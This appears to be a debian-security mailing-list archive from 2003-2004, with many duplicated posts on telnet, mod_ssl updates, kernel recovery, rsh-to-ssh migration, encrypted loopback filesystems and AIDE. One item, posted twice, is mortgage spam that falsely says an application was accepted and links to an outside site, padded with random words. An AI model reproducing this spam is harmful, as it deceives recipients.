purely line-by-line.  This worm (or script-kiddie zombie?) always tries
root, admin, then test, ...

 If it ever starts trying account names that actually exist, and aren't
blocked from logging in entirely, I might see if I can get something to use
iptables to block that IP for 15minutes after seeing that sequence, since
it's a perfect signal that it's a bogus attack, and that it will try a bunch
of logins right away, then never come back.

 Has anyone logged the passwords these attacks try?

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Peter McAlpine 
On Fri, 2004-09-24 at 18:35, Dale Amon wrote:
> On Sat, Sep 25, 2004 at 08:28:13AM +1000, Matthew Palmer wrote:
> > Cisco gear contains the Debian telnetd?  And if that's true, how would us
> > releasing a DSA for it necessarily help all the Cisco routers out there.
> > We're not talking about the general intelligence of using telnet (or, at
> > least, that wasn't the initial topic of discussion), but rather the
> > possibility of fixing security problems in the stock telnetd in Debian.
> 
> The question asked was "why is anyone still using telnet
> when there is ssh". And I would say that Cisco and some
> other gear are about the only reasons why anyone would
> still make a connection with the telnet protocol (other
> than for testing odd things... I used to use 'telnet foo 110'
> to hand test my company pop server when someone had problems.

I totally agree that ssh should definately be used if available, but
telnetd has saved me more than once.

For example, I am responsible for maintaining machines all over the
world, and telnet will allow me to login more quickly than ssh if the
machine is under some extremely high load and is about to crash without
intervention.

I've also had some twit administrator change the permissions on an ssh
directory, or run ssh-keygen without thinking, and as a result I'm
unable to connect via ssh. telnet is all that saved me from waking
somebody up at 3am to get access to a machine in another country.

In addition, some machines I maintain are rather old, and the load
caused by ssh has become a concern on these machines. Also, you try
finding ssh-client rpms for Redhat Manhattan (5.0) which will properly
and reliably communicate with any recent version of sshd.

(Note that in all these examples I've been telnet'ing over a private
frame connection or VPN).

> So no, I was not replying about Debian fixes, I was replying
> to the general question of 'why telnet at all'.


signature.asc
Description: This is a digitally signed message part

Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-21 Thread Peter Holm 
On Tue, 20 Jul 2004 13:10:08 +0200, Peter Holm <[EMAIL PROTECTED]> wrote:

>Please point me to a website where all the things, that you mentioned,
>are explained in detail and what exactly volunteers can do to help the
>security team, so I can decide, on which point I can jump in and help.

This was not a joke. If there was a nice howto-like website non-guru
debian users could follow the needs of the security team, maybe you
would get more help. 

I am a typical "intermediate" user. I know how to compile kernel and
software, getting deeper into it every day, I am constantly reading on
with all kinds of tutorials / manuals / books to deepen my knowledge
and would be happy to contribute something to the debian project, if
it was only following some step-by-step instructions on doing some
tests. 

Following some clear instructions would enable me, and I think lots of
other "willing contributors", to help. 

For me it seems like a lot of work of the debian project is hidden
behind a curtain of "higher expertise", not easy to understand what
happens behind that curtain. It is not too openly documented, how
exactly are all the processes organized and, most importantly, jump-in
points for starters are not easily found. Not everbody has the time to
follow endless discussions on mailing lists: I need a simply
structured website with instructions on "how to help". 

All the things that you asked me I never knew that the security team
has a demand for. In fact, the security team is an extremely "dark
corner" of the debian project, I never read anything about it and how
it´s work is done. 

If you need help on that project, why do you make it so hard to step
in?

Thanks for your attention,
Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-20 Thread Peter Holm 
On Tue, 20 Jul 2004 01:50:07 +0200, Greg Folkert
<[EMAIL PROTECTED]> wrote:

>Can you in fact do anything to help out? Are you even willing to
>Volunteer?

Please point me to a website where all the things, that you mentioned,
are explained in detail and what exactly volunteers can do to help the
security team, so I can decide, on which point I can jump in and help.

Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: mod_ssl 2.8.19 for Apache 1.3.31

2004-07-19 Thread Peter Holm 
On Mon, 19 Jul 2004 23:30:14 +0200, Phillip Hofmeister
<[EMAIL PROTECTED]> wrote:

>Is this line in your /etc/apt/sources.list (or a line like it...)
>deb http://security.debian.org stable/updates main non-free contrib

my /etc/apt/sources.list contains:

deb http://security.debian.org/ stable/updates main

does this affect updates for mod_ssl? I see nothing about an available
update for this mod_ssl problem on debian.org/security?

Thanks for your attention and help!

Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

mod_ssl 2.8.19 for Apache 1.3.31

2004-07-19 Thread Peter Holm 
Hi,

as you can see [1] there was a problem with mod_ssl. Are there any
security updates for woody? I see nothing with apt-get upgrade, am I
doing something wrong? Or do I have to install new mod_ssl package
myself? 

my understanding of debian packaging system was that I will do NOT
have to install packages myself as security fixes will be provided
with apt-get update / upgrade. is this not correct?


[1] http://www.mail-archive.com/[EMAIL PROTECTED]/msg16853.html


Thank you very much for your attention,
Peter


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Don't worry, just listen

2004-05-11 Thread Peter Shipman 
Thank you for your   mor tg age   application, which we received yesterday.
We are glad to confirm that your application is accepted and you can
get the lowest fixed rate.

Could we ask you to please fill out our 15 second post-application for more 
details.

http://gotmortgageloans.com/?partid=saving

Yours sincerely,
Justin T. Lockhart
Mor tg age   Broker Association.




To modify your future preference with us: 
http://gotmortgageloans.com/st.html 

inductance ecumenist jocular controvertible punster uproot possemen von 
cadillac capitoline barberry coxcomb abdicate invoice pothole bayou spherule 
heterogeneity surrogate decouple hone kiwanis blackburn turvy forrest dialectic 
curran 

whizzing further coachwork chalice stevenson suck manslaughter davenport auto 
guerdon sherwood whore plasm invertebrate copernican tan rotarian rainbow 
pisces scarf betoken vest punctuate compline stormbound geophysical stake harry 
facsimile

Don't worry, just listen

2004-05-11 Thread Peter Shipman 
Thank you for your   mor tg age   application, which we received yesterday.
We are glad to confirm that your application is accepted and you can
get the lowest fixed rate.

Could we ask you to please fill out our 15 second post-application for more details.

http://gotmortgageloans.com/?partid=saving

Yours sincerely,
Justin T. Lockhart
Mor tg age   Broker Association.




To modify your future preference with us: 
http://gotmortgageloans.com/st.html 

inductance ecumenist jocular controvertible punster uproot possemen von cadillac 
capitoline barberry coxcomb abdicate invoice pothole bayou spherule heterogeneity 
surrogate decouple hone kiwanis blackburn turvy forrest dialectic curran 

whizzing further coachwork chalice stevenson suck manslaughter davenport auto guerdon 
sherwood whore plasm invertebrate copernican tan rotarian rainbow pisces scarf betoken 
vest punctuate compline stormbound geophysical stake harry facsimile 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: [SECURITY] [DSA 479-1] New Linux 2.4.18 packages fix local root exploit (source+alpha+i386+powerpc)

2004-04-15 Thread Peter Cordes 
On Thu, Apr 15, 2004 at 09:33:32PM +0200, David R wrote:
> Yes, any ideas how to fix this? I'm a newbie, so a bit new to Linux. When I
> installed this 2.4.18 package, it blew up my network card, so I am unable to
> get the new, fixed package. I thought about using apt-get remove to get rid
> of the patched kernel, but somehow this seemed ungood to me, so I tried
> booting from LinuxOLD, which points to the original (as far as I can tell)
> vmlinuz-2.4.18-686. However, when I try this, I get the following error:
> 
> Kernel Panic: VFS: Unable to mount root FS on 03:01

 I'm guessing that the wrong initrd is getting loaded for the kernel that's
booting.  Check your /boot/grub/menu.lst (or /etc/lilo.conf), and the
symlinks in /boot for initrd-old.img (or whatever it's called).

> What do I do? Do I use apt-get remove to get rid of the patched kernel? Do I
> do something else?

 Probably better to get a working kernel booted before you remove anything.
If you have any kernel .debs that used to work, you could try installing one
with dpkg -i.  This might end up downgrading a kernel package you have
installed, but just removing things won't help.  (Debian's package scripts
usually leave the /boot symlinks broken when I remove a kernel package, even
if it was totally obsolete and the links weren't pointing to any files from
that package...)  Your best bet is to look at the symlinks yourself, and get
them pointing to the right place.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC

Re: [SECURITY] [DSA 479-1] New Linux 2.4.18 packages fix local root exploit (source+alpha+i386+powerpc)

2004-04-15 Thread Peter Cordes 
On Thu, Apr 15, 2004 at 09:33:32PM +0200, David R wrote:
> Yes, any ideas how to fix this? I'm a newbie, so a bit new to Linux. When I
> installed this 2.4.18 package, it blew up my network card, so I am unable to
> get the new, fixed package. I thought about using apt-get remove to get rid
> of the patched kernel, but somehow this seemed ungood to me, so I tried
> booting from LinuxOLD, which points to the original (as far as I can tell)
> vmlinuz-2.4.18-686. However, when I try this, I get the following error:
> 
> Kernel Panic: VFS: Unable to mount root FS on 03:01

 I'm guessing that the wrong initrd is getting loaded for the kernel that's
booting.  Check your /boot/grub/menu.lst (or /etc/lilo.conf), and the
symlinks in /boot for initrd-old.img (or whatever it's called).

> What do I do? Do I use apt-get remove to get rid of the patched kernel? Do I
> do something else?

 Probably better to get a working kernel booted before you remove anything.
If you have any kernel .debs that used to work, you could try installing one
with dpkg -i.  This might end up downgrading a kernel package you have
installed, but just removing things won't help.  (Debian's package scripts
usually leave the /boot symlinks broken when I remove a kernel package, even
if it was totally obsolete and the links weren't pointing to any files from
that package...)  Your best bet is to look at the symlinks yourself, and get
them pointing to the right place.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

rsh to ssh migration

2004-03-19 Thread Peter McAlpine 
Hello,

The company I just started working for has grown out of the 80s and uses
networking extensively in all of its services. We currently use rsh and
rcp EXTENSIVELY to move between 40-60 computers through a frame, and our
customers are getting more and more interested in hearing what our
security policy is... problem is, we don't have one. Ever since arriving
I've been trying to convince my supervisor that rsh should be given the
boot, but he and others are VERY concerned about the amount of effort it
would take to make the transition.

So I'm looking for hints and tips about migrating from rsh to ssh.
Comments? Suggestions? All are appreciated!

-Peter


signature.asc
Description: This is a digitally signed message part

rsh to ssh migration

2004-03-19 Thread Peter McAlpine 
Hello,

The company I just started working for has grown out of the 80s and uses
networking extensively in all of its services. We currently use rsh and
rcp EXTENSIVELY to move between 40-60 computers through a frame, and our
customers are getting more and more interested in hearing what our
security policy is... problem is, we don't have one. Ever since arriving
I've been trying to convince my supervisor that rsh should be given the
boot, but he and others are VERY concerned about the amount of effort it
would take to make the transition.

So I'm looking for hints and tips about migrating from rsh to ssh.
Comments? Suggestions? All are appreciated!

-Peter


signature.asc
Description: This is a digitally signed message part

unsubscribe

2004-03-01 Thread Peter Jensen 



 

unsubscribe

2004-03-01 Thread Peter Jensen 



 

Re: Dsniff/mailsnarf

2004-02-25 Thread DI Peter Burgstaller 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 For all of us non native speakers of english and living outside the 
USA, here's some info on the acronyms to follow the thread:


http://www.safetyfile.com/page/S/CTGY/HIPPA

http://www.gaarde.org/acronyms/?lookup=cya


Thanks Jose for that .. :)

And .. btw. if I ever were to send such information out .. I certainly 
would make sure that
NO ONE could read that info plain text (method here>)


- - Just my 2c
- - Cheers, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAkA8YTcACgkQezyUhHKdNXTFugCdGGrCTeug+QA5zmrY6HaT49sa
BHkAn1hhN/8b5DExgSAXFpA07k8U6vZZ
=h0iC
-END PGP SIGNATURE-

Re: Dsniff/mailsnarf

2004-02-25 Thread DI Peter Burgstaller 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
 For all of us non native speakers of english and living outside the 
USA, here's some info on the acronyms to follow the thread:

http://www.safetyfile.com/page/S/CTGY/HIPPA

http://www.gaarde.org/acronyms/?lookup=cya
Thanks Jose for that .. :)

And .. btw. if I ever were to send such information out .. I certainly 
would make sure that
NO ONE could read that info plain text ()

- - Just my 2c
- - Cheers, Peter
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)
iEYEARECAAYFAkA8YTcACgkQezyUhHKdNXTFugCdGGrCTeug+QA5zmrY6HaT49sa
BHkAn1hhN/8b5DExgSAXFpA07k8U6vZZ
=h0iC
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Mail Delivery System

2004-02-10 Thread peter 
This is an autoresponder. I'll never see your message.

Re: Mail Delivery System

2004-02-10 Thread peter 
This is an autoresponder. I'll never see your message.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Firewall: Need Advice

2004-02-07 Thread Peter Gossner 
On 07 Feb 2004 10:38:51 +0200  E&Erdem <[EMAIL PROTECTED]> wrote:
>Hi,
>I've been using iptables (or i assuming that). But at boot time it
>gives an error: "Aborting iptables load: unknown rulesets "active" ". I
>couldn't find the problem. I searched via google, and found
>dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
>documents. But i think i lost some points, because i don't understand
>something. 
>
>Before this i want to ask that, do i need firewall? Yes, i know this is
>very important tool for whose, who taking care about security. And i
>can say i'm a paranoid about security. But all of my ports closed.
>There isn't any service listen. But sometimes i need httpd and ssh.
>
>This machine shares internet connection with a small network. So i have
>to becareful about this. 
All the more reason for a firewall.
The firewall should be on the machine that actually connects to the net.
Try using something like firestarter to get started with.

 firestarter is a GNOME program that will help you  in  configuring  and
   monitoring a GNU/Linux firewall using either ipchains or
iptables.
The latest version of Firestarter can always be found at



Essentially it writes scripts for you and starts itself up when needed.

Pete

>
>Thanks now...
>
>P.S: Sory, my English is not enough (especially technical) for telling
>my problem in a clear way. I hope you can understand.  
>
>-- 
>__
> E&Erdem
>-- 
>   
>
>
>-- 
>To UNSUBSCRIBE, email to [EMAIL PROTECTED]
>with a subject of "unsubscribe". Trouble? Contact
>[EMAIL PROTECTED]

Re: Firewall: Need Advice

2004-02-07 Thread Peter Gossner 
On 07 Feb 2004 10:38:51 +0200  E&Erdem <[EMAIL PROTECTED]> wrote:
>Hi,
>I've been using iptables (or i assuming that). But at boot time it
>gives an error: "Aborting iptables load: unknown rulesets "active" ". I
>couldn't find the problem. I searched via google, and found
>dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
>documents. But i think i lost some points, because i don't understand
>something. 
>
>Before this i want to ask that, do i need firewall? Yes, i know this is
>very important tool for whose, who taking care about security. And i
>can say i'm a paranoid about security. But all of my ports closed.
>There isn't any service listen. But sometimes i need httpd and ssh.
>
>This machine shares internet connection with a small network. So i have
>to becareful about this. 
All the more reason for a firewall.
The firewall should be on the machine that actually connects to the net.
Try using something like firestarter to get started with.

 firestarter is a GNOME program that will help you  in  configuring  and
   monitoring a GNU/Linux firewall using either ipchains or
iptables.
The latest version of Firestarter can always be found at



Essentially it writes scripts for you and starts itself up when needed.

Pete

>
>Thanks now...
>
>P.S: Sory, my English is not enough (especially technical) for telling
>my problem in a clear way. I hope you can understand.  
>
>-- 
>__
> E&Erdem
>-- 
>   
>
>
>-- 
>To UNSUBSCRIBE, email to [EMAIL PROTECTED]
>with a subject of "unsubscribe". Trouble? Contact
>[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Web based password changer

2004-01-27 Thread Peter Cordes 
On Fri, Jan 23, 2004 at 04:13:35PM +1100, Michael Sharman wrote:
> how about:
> 
> echo $user:$newpasswd | chpasswd
> 

 Better check if chpasswd actually works.  The comments in the postinst for
sash indicate it doesn't use PAM, and you have to do your own MD5 crypting.
If that's correct, you can't just use chpasswd.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC

Re: Web based password changer

2004-01-27 Thread Peter Cordes 
On Fri, Jan 23, 2004 at 04:13:35PM +1100, Michael Sharman wrote:
> how about:
> 
> echo $user:$newpasswd | chpasswd
> 

 Better check if chpasswd actually works.  The comments in the postinst for
sash indicate it doesn't use PAM, and you have to do your own MD5 crypting.
If that's correct, you can't just use chpasswd.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Crypto-Swap questions

2004-01-21 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 10:53:10PM -0800, Johannes Graumann wrote:
> Is the encryptionloop significantly slower than
> diskwrite/read speed?

 No, but it uses CPU, and disk I/O doesn't (when using dma:  with IDE, use
hdparm -v /dev/hda  to check.  With SCSI, well, you bought it so you
wouldn't have to worry about crap like that. :)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: 2.6.1 CryptoAPI woes

2004-01-21 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote:
> I feel this is kind of over my head ... to boil it down: does it even
> make sense to run reiserfs inside a loopback partition?

 Yes, if the file you're looping back to is on a journalled filesystem, or
is a partition.

 (ext3 is fine, but you need to patch reiserfs for ordered data.)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: Crypto-Swap questions

2004-01-21 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 10:53:10PM -0800, Johannes Graumann wrote:
> Is the encryptionloop significantly slower than
> diskwrite/read speed?

 No, but it uses CPU, and disk I/O doesn't (when using dma:  with IDE, use
hdparm -v /dev/hda  to check.  With SCSI, well, you bought it so you
wouldn't have to worry about crap like that. :)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: 2.6.1 CryptoAPI woes

2004-01-21 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 11:07:51PM -0800, Johannes Graumann wrote:
> I feel this is kind of over my head ... to boil it down: does it even
> make sense to run reiserfs inside a loopback partition?

 Yes, if the file you're looping back to is on a journalled filesystem, or
is a partition.

 (ext3 is fine, but you need to patch reiserfs for ordered data.)

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: 2.6.1 CryptoAPI woes

2004-01-20 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 11:58:41PM -0500, Hubert Chan wrote:
> >>>>> "Johannes" == Johannes Graumann <[EMAIL PROTECTED]> writes:
> 
> [...]
> 
> Johannes> And on another note: in
> Johannes> 
> http://www.mirrors.wiretapped.net/security/cryptography/filesystems/loop-aes/loop-AES.README
> Johannes> I read the following: "Don't use a journaling file system on
> Johannes> top of file backed loop device, unless underlying file system
> Johannes> is journaled and guarantees data=ordered or data=journal."
> Johannes> Can anybody comment on whether I can use reiserfs on top of my
> Johannes> loopback?
> 
> The comment has nothing to do with whether or not your encrypted
> filesystem is a journaling filesystem with or without data=ordered. 

 Actually, it does.

> It
> has to do with using a file-backed loop device (versus partition-backed
> loop device), where the file is sitting on a journaling filesystem.  If
> your loop device is a partition, or is file-based, but sits on top of a
> non-journaled filesystem

 Wait a second;  I think this one doesn't belong in the list of things that
will be correct.

> or a journaled filesystem with data=ordered or
> journaled, then you can use any filesystem without problems.  (Or, at
> least, you won't (shouldn't) run into any problems other than what you
> might run into if it were not on a loopback device.)
> 
> Basically, if you don't have data=ordered, or data=journaled, any system
> crash could completely screw up your entire loopback, rendering it
> completely unusable.  If you don't plan on having any system crashes or
> hard reboots, I think you can still run a loopback on top a
> non-data=ordered journaled filesystem fairly safely.

 No, the point is that journaling file systems depend on stuff being written
to disk in the order they want, so if something goes wrong at _any_ moment,
they can pick up the pieces.  ext3 with data=writeback, for example, only
bothers to strictly control the order of metadata.  A loopback to a file on
such a filesystem will not preserve write ordering, so a journaling
filesystem on top of it will be making false assumptions.  Filesystem
metadata (which needs to be ordered) is just data on the loopback device.
However, if the underlying filesystem preserves data ordering, it can
satisfy the requirements of the journaling filesystem that's on top of it.

 I'm not sure if you need data=journal on the underlying filesystem for
data=journal on the loopback filesystem to make sense, but I don't think so.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: 2.6.1 CryptoAPI woes

2004-01-20 Thread Peter Cordes 
On Tue, Jan 20, 2004 at 11:58:41PM -0500, Hubert Chan wrote:
> >>>>> "Johannes" == Johannes Graumann <[EMAIL PROTECTED]> writes:
> 
> [...]
> 
> Johannes> And on another note: in
> Johannes> 
> http://www.mirrors.wiretapped.net/security/cryptography/filesystems/loop-aes/loop-AES.README
> Johannes> I read the following: "Don't use a journaling file system on
> Johannes> top of file backed loop device, unless underlying file system
> Johannes> is journaled and guarantees data=ordered or data=journal."
> Johannes> Can anybody comment on whether I can use reiserfs on top of my
> Johannes> loopback?
> 
> The comment has nothing to do with whether or not your encrypted
> filesystem is a journaling filesystem with or without data=ordered. 

 Actually, it does.

> It
> has to do with using a file-backed loop device (versus partition-backed
> loop device), where the file is sitting on a journaling filesystem.  If
> your loop device is a partition, or is file-based, but sits on top of a
> non-journaled filesystem

 Wait a second;  I think this one doesn't belong in the list of things that
will be correct.

> or a journaled filesystem with data=ordered or
> journaled, then you can use any filesystem without problems.  (Or, at
> least, you won't (shouldn't) run into any problems other than what you
> might run into if it were not on a loopback device.)
> 
> Basically, if you don't have data=ordered, or data=journaled, any system
> crash could completely screw up your entire loopback, rendering it
> completely unusable.  If you don't plan on having any system crashes or
> hard reboots, I think you can still run a loopback on top a
> non-data=ordered journaled filesystem fairly safely.

 No, the point is that journaling file systems depend on stuff being written
to disk in the order they want, so if something goes wrong at _any_ moment,
they can pick up the pieces.  ext3 with data=writeback, for example, only
bothers to strictly control the order of metadata.  A loopback to a file on
such a filesystem will not preserve write ordering, so a journaling
filesystem on top of it will be making false assumptions.  Filesystem
metadata (which needs to be ordered) is just data on the loopback device.
However, if the underlying filesystem preserves data ordering, it can
satisfy the requirements of the journaling filesystem that's on top of it.

 I'm not sure if you need data=journal on the underlying filesystem for
data=journal on the loopback filesystem to make sense, but I don't think so.

-- 
#define X(x,y) x##y
Peter Cordes ;  e-mail: X([EMAIL PROTECTED] , des.ca)

"The gods confound the man who first found out how to distinguish the hours!
 Confound him, too, who in this place set up a sundial, to cut and hack
 my day so wretchedly into small pieces!" -- Plautus, 200 BC


signature.asc
Description: Digital signature

Re: aide, apt-get and remote management...

2003-12-14 Thread DI Peter Burgstaller 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I would like to thank everybody for their great input.
It was very useful to see your responses.

I guess the recent rootings have made us all a little more careful.

Take care, Peter

- --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90 

-BEGIN PGP SIGNATURE-

Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/cHbMACgkQezyUhHKdNXSmbACggFX9Lf8NKRYInDG7CDgMDT78
NTIAnAxIrmcGUyyjmYEDZo6DS2QuJRfo
=v37l
-END PGP SIGNATURE-

Re: aide, apt-get and remote management...

2003-12-14 Thread DI Peter Burgstaller 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
I would like to thank everybody for their great input.
It was very useful to see your responses.
I guess the recent rootings have made us all a little more careful.

Take care, Peter

- --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90 

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/cHbMACgkQezyUhHKdNXSmbACggFX9Lf8NKRYInDG7CDgMDT78
NTIAnAxIrmcGUyyjmYEDZo6DS2QuJRfo
=v37l
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov 
On 11 Dec 2003, Douglas F. Calvert wrote:
> When I do the files are obviously different in the aide database and
> I wondering if anyone has come up with a way to deal with these
> differences.

Do you mean that new signatures don't match the ones in database?  In
this case you review changes and if you're satisfied they are
expected, just replace old database with new one.  You need to keep
database up to date.  My AIDE reports are usually pretty short unless
something big happens, like new packages, or reboot.

    - Peter

-- 
Peter Solodov| Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada

Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov 
On 11 Dec 2003, Douglas F. Calvert wrote:
> When I do the files are obviously different in the aide database and
> I wondering if anyone has come up with a way to deal with these
> differences.

Do you mean that new signatures don't match the ones in database?  In
this case you review changes and if you're satisfied they are
expected, just replace old database with new one.  You need to keep
database up to date.  My AIDE reports are usually pretty short unless
something big happens, like new packages, or reboot.

    - Peter

-- 
Peter Solodov| Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov 
On 11 Dec 2003, DI Peter Burgstaller wrote:
> Hi there,
>
> I'm trying to use aide now as well .. but with the default debian
> config .. it produces every day massive changes .. especially to the
> /var/log/* files due to logrotate.
>
> Any reasonable settings that account for that?

Modify AIDE's config to suit your needs.  Here's what works for me:

  # check user, group and permissions
  /var/log u+g+p
  # expect files to grow
  /var/log/.* >
  # permissions, user, group, number of links, and growing size for
  # syslog logs
  /var/log/syslog/.* p+u+g+n+S
  # don't check any of the following log directories
  =/var/log/(sysstat|setuid|apache|exim|ksymoops) R

And I don't use Debian package, I've compiled AIDE myself.  The config
files I'm using probably have very little in common with what Debian
supplies.

- Peter

-- 
Peter Solodov    | Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada

Re: aide, apt-get and remote management...

2003-12-11 Thread Peter Solodov 
On 11 Dec 2003, DI Peter Burgstaller wrote:
> Hi there,
>
> I'm trying to use aide now as well .. but with the default debian
> config .. it produces every day massive changes .. especially to the
> /var/log/* files due to logrotate.
>
> Any reasonable settings that account for that?

Modify AIDE's config to suit your needs.  Here's what works for me:

  # check user, group and permissions
  /var/log u+g+p
  # expect files to grow
  /var/log/.* >
  # permissions, user, group, number of links, and growing size for
  # syslog logs
  /var/log/syslog/.* p+u+g+n+S
  # don't check any of the following log directories
  =/var/log/(sysstat|setuid|apache|exim|ksymoops) R

And I don't use Debian package, I've compiled AIDE myself.  The config
files I'm using probably have very little in common with what Debian
supplies.

- Peter

-- 
Peter Solodov    | Concordia University 
http://alcor.concordia.ca/~peter | Montreal, QC, Canada


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: aide, apt-get and remote management...

2003-12-11 Thread DI Peter Burgstaller 

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi there,

I'm trying to use aide now as well .. but with the default debian 
config .. it produces
every day massive changes .. especially to the /var/log/* files due to 
logrotate.


Any reasonable settings that account for that?

Any advice would be greatly appreciated.
- - - Cheers, Peter
- - --
  Dipl.-Ing. Peter Burgstaller
  Technical Director
  @ all information network & services gmbh
  email: [EMAIL PROTECTED]
  phone: +43 662 452335
  fax  : +43 662 452335 90 -BEGIN PGP 
SIGNATURE-

Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/YWCQACgkQezyUhHKdNXRreACeMK9Pt4LIxnKmd8I1GhtaHIT2
vQoAn0YJHamV0D4wJAu0ChFZ6RFijHNe
=6MVw
- -END PGP SIGNATURE-

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.3 (Darwin)

iEYEARECAAYFAj/YWJwACgkQezyUhHKdNXQNxgCbBbDuNdmzHxcKlJvmKL8kAnwK
